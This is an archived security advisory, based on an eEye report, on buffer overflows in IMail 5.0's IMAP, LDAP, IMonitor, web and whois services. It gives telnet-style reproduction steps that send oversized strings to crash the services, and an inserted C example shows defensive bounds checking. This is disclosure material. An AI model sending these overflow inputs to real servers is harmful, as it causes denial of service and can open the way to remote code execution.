TUCoPS :: Unix :: General :: imail2.htm



Multiple IMail 5.0 Vulnerabilities
Vulnerability
 Multiple IMail Vulnerabilities
Affected
 IMail 5.0
Description
 The following is based on an eEye Digital Security Team advisory.
 The holes below can be used as a Denial of Service against the
 various services mentioned and, in some cases, to remotely
 execute code.
 Imapd (143)
 ===========
 The imapd login process does not do proper bounds checking on
 usernames and passwords.
 * OK IMAP4 Server (IMail 4.06)
 X LOGIN glob1 glob2
 Where glob1 is 1200 characters and glob2 is 1300 characters. The
 imapd service will crash with the usual overflow error.
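 As an added illustration (not IMail's code and not part of the eEye advisory), a LOGIN parser that checks each argument's length before copying rejects the 1200/1300-character input described above instead of overflowing. The 64-byte limits and the names take_token, parse_login and check_lengths are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum { MAX_USER = 64, MAX_PASS = 64 }; /* assumed limits, not IMail values */
enum { LOGIN_OK = 0, LOGIN_SYNTAX = -1, LOGIN_TOO_LONG = -2 };

/* Copy one space-delimited token into out (capacity cap, NUL included) and
 * advance *p past it. Returns the token length, or -1 if it does not fit. */
static int take_token(const char **p, char *out, size_t cap)
{
    const char *s = *p + strspn(*p, " ");
    size_t n = strcspn(s, " \r\n");
    *p = s + n;
    out[0] = '\0';
    if (n >= cap) return -1;      /* reject instead of truncating or overflowing */
    memcpy(out, s, n);
    out[n] = '\0';
    return (int)n;
}

/* Parse "<tag> LOGIN <user> <pass>", checking every length before copying. */
int parse_login(const char *line, char *user, char *pass)
{
    char tag[16], cmd[16];
    const char *p = line;
    if (take_token(&p, tag, sizeof tag) <= 0) return LOGIN_SYNTAX;
    if (take_token(&p, cmd, sizeof cmd) <= 0 || strcasecmp(cmd, "LOGIN") != 0)
        return LOGIN_SYNTAX;
    int u = take_token(&p, user, MAX_USER);
    int w = take_token(&p, pass, MAX_PASS);
    if (u < 0 || w < 0) return LOGIN_TOO_LONG;
    return (u == 0 || w == 0) ? LOGIN_SYNTAX : LOGIN_OK;
}

/* Build a constructed LOGIN line with filler arguments and return the verdict. */
int check_lengths(int ulen, int plen)
{
    char line[4096], user[MAX_USER], pass[MAX_PASS];
    /* %0*d prints a run of '0' characters of the requested width */
    if (snprintf(line, sizeof line, "X LOGIN %0*d %0*d\r\n", ulen, 0, plen, 0) >= (int)sizeof line)
        return LOGIN_SYNTAX;
    return parse_login(line, user, pass);
}

int main(void)
{
    printf("short: %d, 1200/1300 chars: %d\n", check_lengths(5, 8), check_lengths(1200, 1300));
    return 0;
}
```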
 LDAP (389)
 ==========
 Telnet to server.com 389
 Send: Y glob1
 hit enter twice
 Server Returns: 0
 Send: Y glob2
 hit enter
 Where glob1 and glob2 are 2375 characters and Y is Y. The LDAP
 service goes to 90 percent or so and idles there, using up most
 system resources.
 IMonitor (8181)
 ===============
 Telnet to server.com 8181
 Send: glob1
 hit enter twice
 Where glob1 is 2045 characters. The IMonitor service crashes with
 the normal overflow message.
 IMail Web Service (8383)
 ========================
 Telnet to server.com 8383
 Send: GET /glob1/
 Where glob1 is 3000 characters. The usual overflow message will
 be displayed. This one looks to be easily exploitable.
 Whois32 Daemon (43)
 ===================
 Telnet to server.com 43
 Send: glob1
 Where glob1 is 1000 characters. The usual overflow message will
 be displayed. Ya... starting to sound old.
Solution
 Vendor has been notified, Waiting for response...
